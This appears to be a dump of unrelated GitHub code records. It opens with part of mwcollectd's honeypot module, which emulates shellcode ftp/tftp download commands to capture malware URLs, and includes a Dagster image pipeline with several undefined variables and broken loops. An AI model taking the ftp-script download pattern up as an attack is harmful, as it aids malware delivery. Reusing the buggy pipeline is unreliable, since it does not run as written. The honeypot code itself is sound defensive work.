'/c':\n\t\t\t\tself.emulate([command[2:]], recorder)\n\t\t\telif command[0] == 'echo':\n\t\t\t\tline = ''\n\n\t\t\t\tfor word in command[1:]:\n\t\t\t\t\tif word == '>':\n\t\t\t\t\t\tself.vfiles[command[-1]] = line + '\\n'\n\t\t\t\t\telif word == '>>':\n\t\t\t\t\t\tif command[-1] not in self.vfiles:\n\t\t\t\t\t\t\tself.vfiles[command[-1]] = ''\n\n\t\t\t\t\t\tself.vfiles[command[-1]] += line + '\\n'\n\t\t\t\t\telse:\n\t\t\t\t\t\tif line != '':\n\t\t\t\t\t\t\tline += ' '\n\n\t\t\t\t\t\tline += word\n\t\t\telif command[0] == 'ftp' or command[0] == 'ftp.exe':\n\t\t\t\tfor param in command[1:]:\n\t\t\t\t\tif param[:3] == '-s:':\n\t\t\t\t\t\tinstrs = self.vfiles[param[3:]].split('\\n')\n\n\t\t\t\t\t\thost = None\n\t\t\t\t\t\tport = 21\n\t\t\t\t\t\tuser = 'anonymous'\n\t\t\t\t\t\tpasswd = 'secret'\n\n\t\t\t\t\t\tfor instr in instrs:\n\t\t\t\t\t\t\tw = instr.split(' ')\n\n\t\t\t\t\t\t\tif w[0] == 'open':\n\t\t\t\t\t\t\t\thost = w[1]\n\t\t\t\t\t\t\t\tport = int(w[2])\n\t\t\t\t\t\t\telif w[0] == 'user':\n\t\t\t\t\t\t\t\tuser = w[1]\n\n\t\t\t\t\t\t\t\tif len(w) >= 3:\n\t\t\t\t\t\t\t\t\tpasswd = w[2]\n\t\t\t\t\t\t\telif w[0] == 'get':\n\t\t\t\t\t\t\t\tfilename = ' '.join(w[1:])\n\n\t\t\t\t\t\t\t\tif filename[:1] == '/':\n\t\t\t\t\t\t\t\t\tfilename = filename[1:]\n\n\t\t\t\t\t\t\t\turl = 'ftp://%s:%s@%s:%i/%s' % (user, passwd, host, port, filename)\n\t\t\t\t\t\t\t\tlog(L_SPAM, 'FTP Download via shell: ' + url)\n\n\t\t\t\t\t\t\t\tdispatchEvent('shellcode.download', {\n\t\t\t\t\t\t\t\t\t\t'url': url,\n\t\t\t\t\t\t\t\t\t\t'localfile': filename,\n\t\t\t\t\t\t\t\t\t\t'recorder': recorder\n\t\t\t\t\t\t\t\t\t})\n\n\n\tdef url_TFTP(self, command):\n\t\twhile len(command) > 0 and command[0][0] == '-':\n\t\t\tcommand = command[1:]\n\n\t\tif len(command) != 3:\n\t\t\treturn None\n\n\t\tif command[1] not in ['get', 'put']:\n\t\t\treturn None\n\n\t\treturn ('tftp://' + command[0] + '/' + command[2], command[2])\n\n\ndef start(config):\n\tglobal process_handler\n\tprocess_handler = EventSubscription('shellcode.process', ShellcodeProcessHandler)\n\treturn process_handler.register()\n\n\ndef stop():\n\tglobal process_handler\n\treturn process_handler.unregister()\n","repo_name":"oxff/mwcollectd","sub_path":"src/embed-python/modules/cmd.py","file_name":"cmd.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"2372163830","text":"#===================================================================\n#    Purpose:   Demonstrate basic Python programming in \n# for Lists and Functions\n#===================================================================\n\n# Function to to display temperatures\ndef DisplayTemperatures(HourlyTemperatures, AverageTemp):\n lowTemp = 0\n highTemp = 0\n\n # Get low temperature\n for value in HourlyTemperatures:\n if (lowTemp == 0) or (lowTemp > value):\n lowTemp = value\n\n # Get high temperature\n for value in HourlyTemperatures:\n if (highTemp == 0) or (highTemp < value):\n highTemp = value\n\n # Print all values =================\n\n print(\"\")\n print(\"Hour\\t\\tTemperature\")\n print(\"\")\n\n for index in range(0, len(HourlyTemperatures)):\n print(str((index + 1)).rjust(2, \"0\"), \": 00\\t\\t\", HourlyTemperatures[index])\n\n print(\"\")\n print(\"High Temperature: \\t\", highTemp)\n print(\"Low Temperature: \\t\", lowTemp)\n print(\"Average Temperature: \\t\", AverageTemp) \n print(\"\") \n\n# Function to calculate average temperature\ndef ComputeAverageTemp(HourlyTemperatures):\n totalValue = 0\n\n for value in HourlyTemperatures:\n totalValue += value\n\n return round((totalValue / len(HourlyTemperatures)), 1) \n\n# Function to get temperatures from user\ndef GetTemperatures(HourlyTemperatures):\n\n print(\"\")\n for index in range(0, 24):\n currentInput = int(input(\"Please enter value for slot \" + str((index + 1)) + \": \"))\n\n # Repeat call until we get the correct value\n while (currentInput < 50) or (currentInput > 130):\n currentInput = int(input(\"Please make sure the value is between 50 and 130 \" + str((index + 1)) + \": \"))\n\n HourlyTemperatures.append(currentInput)\n\n# Main function\ndef main():\n HourlyTemperatures = []\n\n GetTemperatures(HourlyTemperatures)\n AverageTemp = ComputeAverageTemp(HourlyTemperatures)\n DisplayTemperatures(HourlyTemperatures, AverageTemp) \n\nmain()","repo_name":"Talleth/PythonLists","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72512789532","text":"# dagster\nfrom dagster import solid, composite_solid, pipeline\n\n# other packages\nimport os\nimport logging\n\n# user-defined libraries\nfrom utils.backend import *\nfrom utils.commons import *\nfrom utils.image import *\nfrom utils.models import * \nfrom utils.utils import *\n\n@solid\ndef get_raw_image_path(context, raw_image_path: str):\n\tcontext.log.info(f\"raw_image_path is: {raw_image_path}\")\n\treturn raw_image_path\n\n@solid\ndef get_theme(context, theme: str):\n\tcontext.log.info(f\"theme is: {theme}\")\n\treturn theme\n\n@solid \ndef get_models(context, models):\n\tcontext.log.info(f\"models is: {models}\")\n\treturn models\n\n@solid\ndef preprocess_raw_image(context, raw_image_path):\n\n\treturn raw_image_path\n\n@solid\ndef execute_color_transfer_model_wrapper(context, raw_image_path: str, palette_path: str, model: str):\n\t# expected output: image array\n\t\n\tif model == PALETTENET:\n\t\treturn request_palettenet(raw_image_path, palette_path)\n\telif model == ITERATIVE_DISTRIBUTION_TRANSFER:\n\t\treturn request_iterative_distribution_transfer(raw_image_path, palette_path)\n\telse:\n\t\traise HTTPError\n\n@solid\ndef construct_output_object(context, segmentation_result_paths: list, color_picker_result: dict):\n\toutput = {}\n\t\n\tfor index, segmentation_result_path, color_picker_result in enumerate(zip(segmentation_result_paths, color_picker_results)):\n\t\toutput_class = \"result_\" + str(index + 1)\n\n\t\toutput[output_class] = {}\n\t\toutput[output_class][\"image_path\"] = segmentation_result_paths[index]\n\t\toutput[output_class][\"colors\"] = color_picker_result[index]\n\n\treturn output\n\n@composite_solid\ndef generate_palettes(theme: str) -> list:\n\t# get palettes from theme name\n\tpalettes = get_theme_palettes(theme)\n\tpalette_colors = {\n\t\t\"palette_1\": [p['colour_name'] for p in palettes['palette_1_colours']],\n\t\t\"palette_2\": [p['colour_name'] for p in palettes['palette_2_colours']],\n\t\t\"palette_3\": [p['colour_name'] for p in palettes['palette_3_colours']],\n\t}\n\tlogging.info(f\"Retrieved color names of {theme}: {palette_colors}\")\n\n\t# generate palette images using palettes\n\tpalette_paths = []\n\tfor index, colors in enumerate(palette_colors):\n\t\tindex = index + 1\n\n\t\tpalette_path = os.path.join(TEMP_DIR, f\"palette_{index}_{timestamp}.jpg\")\n\t\tpalette = generate_palette_image(colors[f\"palette_{index}\"])\n\t\tpalette.save(palette_path)\n\n\t\tpalette_paths.append(palette_path)\n\n\t\tlogging.info(f'Retrieved palette image for: {colors}')\n\n\t# # result 3\n\t# palette_b_path = os.path.join(TEMP_DIR, 'palette_b.jpg')\n\t# palette_b = saturate_image(palette_path, 192)\n\t# cv2.imwrite(palette_b_path, palette_b)\n\n\treturn palette_paths\n\n@solid\ndef color_transfer(context, raw_image_path: str, palette_paths: list, models: list) -> list:\n\ttimestamp = get_timestamp_from_filepath(raw_image_path)\n\tdimensions = get_image_dimensions(raw_image_path)\n\n\tresult_paths = []\n\tfor index, palette_path, model in enumerate(zip(palette_paths, models)):\n\t\tindex = index + 1\n\n\t\tresult_path = os.path.join(TEMP_DIR, f\"colorized_{index}_{timestamp}.jpg\")\n\t\tresult = execute_color_transfer_model_wrapper(image_path, palette_path, model)\n\t\tresult = result.resize(dimensions)\n\t\tresult.save(result_path)\n\n\t\tresult_paths.append(result_path)\n\n\treturn result_paths\n\n@solid\ndef segmentation(context, raw_image_path: str, new_image_paths: list) -> list:\n\ttimestamp = get_timestamp_from_filepath(raw_image_path)\n\n\t# call segmentation API once\n\tmask_path = os.path.join(TEMP_DIR, f\"mask_{timestamp}.png\")\n\tmask = segmentation_request(raw_image_path)\n\tmask.save(mask_path)\n\n\t# overlay results of segmentation API over results\n\tfor index, new_image_path in enumerate(new_image_paths):\n\t\tresult_path = os.path.join(TEMP_DIR, f\"segmented_{index}_{timestamp}.jpg\")\n\t\tresult = apply_mask(raw_image_path, new_image_path, mask_path)\n\t\tresult.save(result_path)\n\n\treturn result_paths\n\n@solid\ndef color_picker(context, raw_image_path: str):\n\ttimestamp = get_timestamp_from_filepath(raw_image_path)\n\n\t# run color picker API\n\tresults = []\n\tfor index, raw_image_path in enumerate(raw_image_path):\n\t\tresult = request_color_picker(raw_image_path)\n\n\t\tresults.append(result)\n\n\treturn results\n\n@solid\ndef super_resolution(context, image_paths: list):\n\tresult_paths = []\n\n\tfor index, image_path in enumerate(image_paths):\n\t\tresult_path = os.path.join(TEMP_DIR, 'superres_result_' + index + '.jpg')\n\n\t\tresult = superres_request(image_path, result_path)\n\n\t\tresult_paths.append(result_path)\n\n\treturn result_paths\n\n@pipeline\ndef colorization_by_theme() -> dict:\n\t\"\"\"\n\traw_image_path: string, local path of image\n\ttheme: string, theme name\n\t\"\"\" \n\n\t# get timestamp from filepath\n\traw_image_path = get_raw_image_path()\n\ttheme = get_theme()\n\tmodels = get_models()\n\n\ttimestamp = get_timestamp_from_filepath(raw_image_path)\n\n\t# process raw image\n\traw_image = get_image(raw_image_path)\n\traw_image = proportionate_resize_image(image=raw_image)\n\traw_image = reduce_image_to_multiples(image=raw_image)\n\traw_image_path = save_image(raw_image, raw_image_path)\n\n\t# raw_image_path = preprocess_raw_image(raw_image_path)\n\tlogging.info(f\"Processed raw image: {raw_image_path}\")\n\n\t# generate palettes\n\tpalette_paths = generate_palettes(theme)\n\tlogging.info(f\"Generate palettes completed: {palette_paths}\")\n\n\t# color transfer\n\tcolor_transfer_result_paths = color_transfer(raw_image_path, palette_paths, models)\n\tlogging.info(f\"Color transfer completed: {color_transfer_result_paths}\")\n\n\t# segmentation\n\tsegmentation_result_paths = segmentation(raw_image_path, color_transfer_result_paths)\n\tlogging.info(f\"Segmentation completed: {segmentation_result_paths}\")\n\n\t# color picker\n\tcolor_picker_results = color_picker(segmentation_result_paths)\n\tlogging.info(f\"Color picker completed: {color_picker_results}\")\n\n\t# super resolution\n\t# super_resolution_result_paths = super_resolution(segmentation_result_paths)\n\t# logging.info(f\"Super resolution completed: {super_resolution_result_paths}\")\n\n\t# return results in json structure as base64 strings\n\tresults = construct_output_object(segmentation_result_paths, color_picker_results)\n\n\treturn results\n\n","repo_name":"crameth/dag_api_experiment","sub_path":"theme_pipeline.py","file_name":"theme_pipeline.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70682614173","text":"'''\nCreated on: 20211018\n\nAuthor: Yi Zheng, Department of Electrical Engineering, DTU\n\n'''\nfrom advanced_eletrolyser_model import *\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef grid_connected(unit_capex_ele = 700, capacity_factor = 0.95, figure = False, country = 'DK1', ele_cs = 2):\n # 读取2020年指定国家的日前市场电价\n ele_price_df = pd.read_csv('./Inputdata/elspot_2020.csv')\n ele_price_se = ele_price_df[country]\n ele_price_ls = [1.16*i for i in ele_price_se.tolist()] # $\n\n # Define an objective capacity factor\n cf = capacity_factor\n\n #-------------------------Find the cut-off price-------------------------Start\n # Sort the price\n ele_price_ls.sort()\n # Cut-off price\n COP = ele_price_ls[int(ele_price_ls.__len__()*cf)-1]\n print(COP)\n if figure:\n fig, ax = plt.subplots()\n ax.plot(range(ele_price_ls.__len__()), ele_price_ls)\n ax.set_xlabel('Time(s)')\n ax.set_ylabel('Price($/MWh)')\n ax.axvline(x = cf * 366*24, ymin= 0.1, ymax= 0.9, color = 'red')\n ax.axhline(y = COP, xmin=0, xmax= 1, linestyle = 'dashed')\n #-------------------------Find the cut-off price-------------------------End\n\n # 实例化一个电解池\n ael = AEL_system(T = 90, P= 30, capacity= 1, unit_capex= unit_capex_ele, om_fixed_factor= 0.03, lifetime= 20,\n cold_start_time= ele_cs, working_range= (0.1, 1),\n nom_hydronge_con_rate=48.65, half_h2_con_rate= 45.5, quarter_h2_con_rate= 43.14)\n\n # 将原始的电价数据的单位改成美元\n ele_price_ls = [1.16*i for i in ele_price_se.tolist()]\n time_horizon = range(ele_price_ls.__len__())\n\n for h in time_horizon:\n # 如果电价高于COP,则关机,如果电价低于COP,则满功率产氢\n if ele_price_ls[h] >= COP:\n ael.shut_down()\n if ael.state == 0 and ele_price_ls[h]', DetailUser.as_view(), name='profile'),\n path('login', views.obtain_auth_token),\n path('signup', SignUp.as_view(), name=\"signup\"),\n\n path('products', ProductList.as_view(), name='products'),\n path('products/', ProductDetail.as_view(), name='product'),\n path('products//order', CreateOrder.as_view(), name='order'),\n]\n","repo_name":"acferten/rest","sub_path":"mysite/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33323338620","text":"#peptide = 'NQEL'\npeptide = 'FNSQGKPRALMGIYGCNMPLDLGKATRQQFLEPDRLCHFSMKQKC'\n#spectrum = [0,99,113,114,128,227,257,299,355,356,370,371,484]\nspectrum = open('dataset_4913_1.txt','r').read().strip().split()\nspectrum = [int(x) for x in spectrum]\nspectrum.sort()\n\namino_acid_mass = {'G':57,'A':71,'S':87,'P':97,'V':99,'T':101,'C':103,'I':113,'L':113,\n 'N':114,'D':115,'K':128,'Q':128,'E':129,'M':131,'H':137,'F':147,\n 'R':156,'Y':163,'W':186}\n\ndef linear_spectrum(peptide, amino_acid_mass):\n prefix_mass = [0]\n for i in range(len(peptide)):\n amino = peptide[i]\n amino_mass = amino_acid_mass[amino]\n prefix_mass.append(prefix_mass[i] + amino_mass)\n\n linear_spectrum = [0]\n for i in range(len(peptide)):\n for j in range(i+1, len(peptide)+1):\n linear_spectrum.append(prefix_mass[j] - prefix_mass[i])\n\n linear_spectrum.sort()\n return linear_spectrum\n\ndef linear_scoring(peptide, spectrum):\n theory_spectrum = linear_spectrum(peptide, amino_acid_mass)\n score = 0\n for i in theory_spectrum:\n if i in spectrum:\n score += 1\n spectrum.remove(i)\n\n return score\n\nprint(linear_scoring(peptide, spectrum))\n\n","repo_name":"maqueredkop/Bioinformatics_Specialization_Coursea_Exercise","sub_path":"bioinfo_sec2/week4/No2_linear_scoring.py","file_name":"No2_linear_scoring.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34765781179","text":"from flask import Flask, render_template, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\n\napp = Flask(__name__)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\nCORS(app)\n\n# FIXME: Include User model to a file or folder called models\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n username = db.Column(db.String(80))\n email = db.Column(db.String(200))\n\n def __init__(self, username, email):\n self.username = username\n self.email = email\n\n def __repr__(self):\n return '' % self.username\n \n def serialize(self):\n return {\n \"id\":self.id,\n \"username\":self.username, \n \"email\":self.email\n }\n\nwith app.app_context():\n db.drop_all()\n db.create_all()\n\n db.session.add(User('admin', 'admin@garatzailea.com'))\n db.session.add(User('guest', 'guest@garatzailea.com'))\n db.session.commit()\n\n users = User.query.all()\n print(users)\n\n@app.route('/')\ndef index():\n # GET status\n return jsonify({ \"message\":\"pong\"})\n\n@app.route('/users', methods=['GET'])\ndef allusers():\n # GET all data from database & sort by id\n data = User.query.order_by(User.id).all()\n return jsonify({\"users\":[auser.serialize() for auser in data]})\n\n@app.route('/users/', methods=['GET'])\ndef oneuser(id):\n auser = User.query.get(id)\n return jsonify(auser.serialize())\n\n@app.route('/users', methods=['POST'])\ndef createusers():\n # POST a data to database\n body = request.json\n if not( 'username' in body):\n return jsonify({\"error\": \"username not found\"})\n if not( 'email' in body):\n return jsonify({\"error\": \"email not found\"})\n \n name = body['username']\n email = body['email']\n auser = User(name, email)\n db.session.add(auser)\n db.session.commit()\n\n return jsonify({\"message\": \"sucess!\", \"data\":auser.serialize()})\n\n@app.route('/users/', methods=['PUT'])\ndef updateuser(id):\n auser = User.query.get(id)\n body = request.json\n if not(auser):\n return jsonify({\"error\": f\"User {id} not found\"})\n if not( 'username' in body):\n return jsonify({\"error\": \"username not found\"})\n if not( 'email' in body):\n return jsonify({\"error\": \"email not found\"})\n\n auser.username = body['username']\n auser.email = body['email']\n db.session.add(auser)\n db.session.commit()\n return jsonify({\"message\": \"sucess!\", \"data\":auser.serialize()})\n\n@app.route('/users/', methods=['DELETE'])\ndef deleteuser(id):\n auser = User.query.filter_by(id=id).first()\n db.session.delete(auser)\n db.session.commit()\n db.session.commit()\n return jsonify({'status': 'user '+id+' has been deleted'})\n\nif __name__ == '__main__':\n app.run()","repo_name":"japeto/simple-api-crud","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6844692329","text":"from flask import Flask, render_template\nfrom flask_restful import Api\nfrom resourses.restaurant import RestaurantList, Restaurant, TraditionalRestaurants\nfrom resourses.index import IndexRepr\nfrom resourses.wine import Wine, RandomWine\nfrom resourses.cocktail import CocktailsOfTheDay\nfrom resourses.dish import Dish, RandomDishFromMeal, LunchDishes, DinnerDishes, RandomDishes\nfrom resourses.breakfast import Breakfast\n\n\napp = Flask(__name__, static_folder='site')\napi = Api(app)\n\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\napi.add_resource(IndexRepr, '/main')\napi.add_resource(RestaurantList, '/restaurants')\napi.add_resource(Restaurant, '/restaurant/')\napi.add_resource(TraditionalRestaurants, '/traditional_restaurants')\napi.add_resource(Wine, '/wine/')\napi.add_resource(RandomWine, '/wine')\napi.add_resource(CocktailsOfTheDay, '//cocktails')\napi.add_resource(Dish, '/dish/')\napi.add_resource(RandomDishFromMeal, '///')\napi.add_resource(RandomDishes, '//dishes')\napi.add_resource(Breakfast, '//breakfast')\napi.add_resource(LunchDishes, '//lunch')\napi.add_resource(DinnerDishes, '//dinner/')\n\n\n@app.after_request\ndef add_cors_headers(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Methods', 'GET') # POST, OPTIONS, PUT, DELETE')\n return response\n\nif __name__ == '__main__':\n import init\n app.run(port=5000, debug=True)\n","repo_name":"natakudm/menu_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12082084489","text":"def fibonacci(n):\n fib_list = [1, 1] # Khởi tạo dãy Fibonacci với hai số đầu tiên là 0 và 1\n while len(fib_list) < n:\n next_number = fib_list[-1] + fib_list[-2] # Tính số Fibonacci tiếp theo\n \n fib_list.append(next_number)\n return fib_list\n\n# Nhập vào số nguyên dương N từ người dùng\nN = int(input(\"Nhập vào số nguyên dương N: \"))\n\n# In dãy Fibonacci có N số đầu tiên\nfib_sequence = fibonacci(N)\nprint(\"Dãy Fibonacci có\", N, \"số đầu tiên là:\")\nfor num in fib_sequence:\n print(num)\n\n","repo_name":"aerovfx/Fullstack4kid","sub_path":"CREATE_APP/Python/PythonChallenge/Level1/b7_fibonaciv2.py","file_name":"b7_fibonaciv2.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"vi","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"2846494135","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: Rachael Kretsch\nBig Data Final Project\nSecondary Protein Structure\n\nanalyse the literature data!!\n\"\"\"\n\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\n\n#==============================================================================\n# \n# struct_file = '../Data/color_fasta.txt' + \"_struct_data.pik\"\n# with open(struct_file, 'rb') as f:\n# structures, sequences = pickle.load(f) \n# \n# new_file = '../Data/color_fasta.txt' + \"_seqs_data.pik\"\n# with open(new_file, 'rb') as f:\n# sequences_2,seqids,names,descriptions = pickle.load(f)\n# \n# good_seqids=['1bfp','3ekh','3ned','4k3g','3cfc',\n# '1xkh','2wht','4w6b','4xvp','3dqh',\n# '1bgp','4q7t','4qgw','5h88','4l1s',\n# '5h89','3s0f','4q9w','3rwt','5hzo']\n# \n# s2D_accuracies = {}\n# s2D_accuracy = 0\n# \n# j=-1\n# \n# s2D_predictions = []\n# for seqid in seqids:\n# j+=1\n# if seqid in good_seqids:\n# struct = structures[j]\n# i=0\n# prediction = []\n# for line in open('../Data/S2D/'+seqid + '_s2d_out.txt'):\n# if line[0]!='>' and line[0]!='#':\n# if i<11:\n# pred = line[40]\n# elif i<101:\n# pred= line[41]\n# else:\n# pred = line[42]\n# if pred=='H':\n# prediction+=[1]\n# elif pred=='E':\n# prediction+=[-1]\n# else:\n# prediction+=[0]\n# i+=1\n# print(seqid)\n# x = range(len(prediction))\n# beta = []\n# alpha = []\n# coil = []\n# for amino in prediction:\n# if amino == -1:\n# beta += [1]\n# alpha += [0]\n# coil += [0]\n# elif amino == 1:\n# beta += [0]\n# alpha += [1]\n# coil += [0]\n# else:\n# beta += [0]\n# alpha += [0]\n# coil += [1]\n# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')\n# plt.scatter(x,coil,label='coil',marker='x', color='green')\n# plt.scatter(x,alpha,label='alpha',color='red')\n# plt.title('Secondary structure prediction s2D '+seqid)\n# plt.xlabel('Amino acid position')\n# plt.ylabel('Probability')\n# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)\n# ax=plt.gca()\n# fig = plt.gcf()\n# fig.set_size_inches\n# ax.set_xlim([0,len(prediction)])\n# ax.set_ylim([0.9,1.1])\n# plt.savefig('../Data/S2D/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')\n# plt.close() \n# s2D_predictions+=[[beta,coil,alpha]]\n# struct=struct[:len(prediction)]\n# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)\n# s2D_accuracy+=acc\n# s2D_accuracies[seqid]=acc\n# \n# s2D_accuracy=s2D_accuracy/len(good_seqids)\n# print(\"accuracy s2D: \"+str(s2D_accuracy))\n# \n# \n# SOPM_accuracies = {}\n# SOPM_accuracy = 0\n# \n# j=-1\n# \n# SOPM_predictions=[]\n# for seqid in seqids:\n# j+=1\n# if seqid in good_seqids:\n# struct = structures[j]\n# prediction = []\n# for line in open('../Data/SOPM/'+seqid + '.sopm.txt'):\n# if line[0]in ['H','C','E'] and len(prediction)')\r\ndef custom_static(filename):\r\n return send_from_directory('static/js', filename, mimetype='text/javascript')\r\n\r\n\r\n@app.route(\"/\")\r\ndef login():\r\n \"\"\"\r\n Отображает страницу входа.\r\n :return: HTML-шаблон страницы входа.\r\n \"\"\"\r\n return render_template(\"login.html\")\r\n\r\n\r\n@app.route('/login', methods=['POST'])\r\ndef login_post():\r\n \"\"\"\r\n Обрабатывает данные, отправленные при попытке входа.\r\n :param str username: Имя пользователя, отправленное из формы входа.\r\n :param str password: Пароль, отправленный из формы входа.\r\n :return: Возвращает результат аутентификации.\r\n \"\"\"\r\n username = request.form['username']\r\n password = request.form['password']\r\n\r\n doctor = Doctor.get_by_username(username)\r\n authorized = doctor and check_password_hash(doctor.password_hash, password)\r\n \r\n if authorized:\r\n login_user(doctor)\r\n return jsonify({'success': True})\r\n else:\r\n return jsonify({'success': False})\r\n \r\n \r\n@app.route(\"/logout\")\r\n@login_required\r\ndef logout():\r\n \"\"\"\r\n Обрабатывает выход из аккаунта\r\n :return: Перенаправляет на страницу входа в аккаунт.\r\n \"\"\"\r\n logout_user()\r\n return redirect(url_for('login'))\r\n\r\n\r\n@app.route('/main')\r\n@login_required\r\ndef main():\r\n \"\"\"\r\n Отображает главную страницу с данными о пациентах и симптомах.\r\n :return: HTML-шаблон главной страницы.\r\n \"\"\"\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/patients')\r\n@login_required\r\ndef patients():\r\n \"\"\"\r\n Отображает страницу с пациентами.\r\n :return: HTML-шаблон страницы с пациентами.\r\n \"\"\"\r\n return render_template('patients.html')\r\n\r\n\r\n@app.route('/history')\r\n@login_required\r\ndef history():\r\n \"\"\"\r\n Отображает страницу с историей запросов.\r\n :return: HTML-шаблон страницы с историей запросов.\r\n \"\"\"\r\n return render_template('history.html')\r\n\r\n#---------------------------------------DONE-1--------------------------------------------\r\n@app.route('/get_request_info', methods=['POST'])\r\n@login_required\r\ndef get_request_info():\r\n \"\"\"\r\n Получает диагноз с помощью модели и возвращает информацию об этом запросе.\r\n :param str id: ID пациента.\r\n :param str name: Полное имя пациента.\r\n :param str oms: Полис ОМС пациента.\r\n :param list symptoms: Список симптомов.\r\n :return: JSON-ответ с информацией для карточки запроса, включая id запроса, имя пациента, имя доктора, симптомы, предсказанный диагноз, комментарии врачей.\r\n \"\"\"\r\n data = request.get_json()\r\n\r\n patient_id = data.get('id')\r\n patient_name = data.get('name')\r\n oms = data.get('oms')\r\n symptom_ids = data.get('symptoms')\r\n \r\n symptoms = [Symptom.get_by_id(id) for id in symptom_ids]\r\n \r\n request_id = Request.add(current_user.id, \r\n patient_id, \r\n [symptom.id for symptom in symptoms], #symptom_ids\r\n ML_MODEL_VERSION)\r\n\r\n disease_name = get_disease([symptom.name for symptom in symptoms])\r\n \r\n disease = Disease(None, None, None)\r\n \r\n if disease_name:\r\n status = 'READY'\r\n disease = Disease.get_by_name(disease_name)\r\n else:\r\n status = 'ERROR'\r\n \r\n Request.update_status(request_id, status, disease.id)\r\n doctor_comments = []\r\n \r\n response_data = ResponseData(\r\n id=request_id,\r\n patient_name=patient_name,\r\n doctor=current_user.name,\r\n symptoms=[symptom.ru_name for symptom in symptoms],\r\n diagnosis=disease.ru_name,\r\n doctor_comments=doctor_comments\r\n )\r\n \r\n return response_data.__dict__\r\n\r\n\r\n#------------------------------------------DONE-2----------------------------------------\r\n@app.route('/get_request_info_by_id', methods=['POST'])\r\n@login_required\r\ndef get_request_info_by_id():\r\n \"\"\"\r\n Получает возвращает информацию о запросе по его id из БД.\r\n :param str request_id: ID запроса.\r\n :return: JSON-ответ с информацией для карточки запроса, включая id запроса имя пациента, имя доктора, симптомы, предсказанный диагноз, комментарии врачей.\r\n \"\"\"\r\n data = request.get_json()\r\n\r\n request_id = data.get('request_id')\r\n\r\n symptoms = Request.get_symptom_ru_names(request_id)\r\n diagnosis_ru_name = Request.get_disease_ru_name(request_id)\r\n comments_values = Comment.get_comments_by_request_id(request_id, current_user.id)\r\n\r\n doctor_comments = [DoctorComment(id=comment_values[0],\r\n doctor=comment_values[1], \r\n time=comment_values[2].strftime(\"%Y-%m-%d %H:%M:%S\"),\r\n comment=comment_values[3], \r\n editable=comment_values[4]) for comment_values in comments_values]\r\n\r\n response_data = ResponseData(\r\n id=request_id,\r\n patient_name=Patient.get_name_by_request_id(request_id),\r\n doctor=current_user.name, \r\n symptoms=symptoms,\r\n diagnosis=diagnosis_ru_name,\r\n doctor_comments=doctor_comments\r\n )\r\n \r\n return response_data.__dict__\r\n\r\n\r\n#----------------------------------DONE-3---------------------------------------------------\r\n@app.route('/load_data_requests', methods=['GET'])\r\n@login_required\r\ndef load_data_requests():\r\n \"\"\"\r\n Получает список запросов для текущего пользователя для указанной страницы в пагинации с использованием поиска.\r\n :param str search: Фильтр.\r\n :param str page: Номер страницы.\r\n :return: JSON-ответ со списком запросов для указанной страницы, включая id запроса, имя пациента, дату, предсказанный диагноз, информацию о комментариях докторов(Без комментариев/Прокомментирован).\r\n \"\"\"\r\n term = request.args.get('search', '').lower()\r\n page = int(request.args.get('page', '1'))\r\n\r\n per_page = 100\r\n #limit = 25\r\n \r\n if (len(term) > 3):\r\n requests = Request.get_requests_page_by_doctor_id_contain_substr(current_user.id, per_page, term)\r\n else:\r\n requests = Request.get_requests_page_by_doctor_id(current_user.id, per_page)\r\n \r\n requests = [RequestData(id=request[0], name=request[1], date=request[2].strftime(\"%Y-%m-%d %H:%M:%S\"), diagnosis=request[3], is_commented=request[4]) for request in requests]\r\n\r\n return jsonify({'results': [request.__dict__ for request in requests], 'pagination': {'more': False }})\r\n\r\n\r\n@app.route('/get_patient_info', methods=['GET'])\r\n@login_required\r\ndef get_patient_info():\r\n \"\"\"\r\n Получает информацию о пациенте по его id.\r\n :param str patient_id: ID пациента.\r\n :return: JSON-ответ с информацией о пациенте, включая его id, полное имя, дату рождения, текущий возраст, Полис ОМС, пол.\r\n \"\"\"\r\n patient_id = request.args.get('patient_id')\r\n\r\n patient = Patient.get_by_id(patient_id)\r\n if not patient:\r\n error_message = {\"error\": \"Ошибка\", \"message\": \"Пациента не существует.\"}\r\n response = jsonify(error_message)\r\n response.status_code = 400\r\n return response\r\n \r\n today = datetime.now()\r\n age = today.year - patient.born_date.year - \\\r\n ((today.month, today.day) < (patient.born_date.month, patient.born_date.day))\r\n\r\n patient_data = PatientData(\r\n id=patient.id,\r\n name=patient.name,\r\n 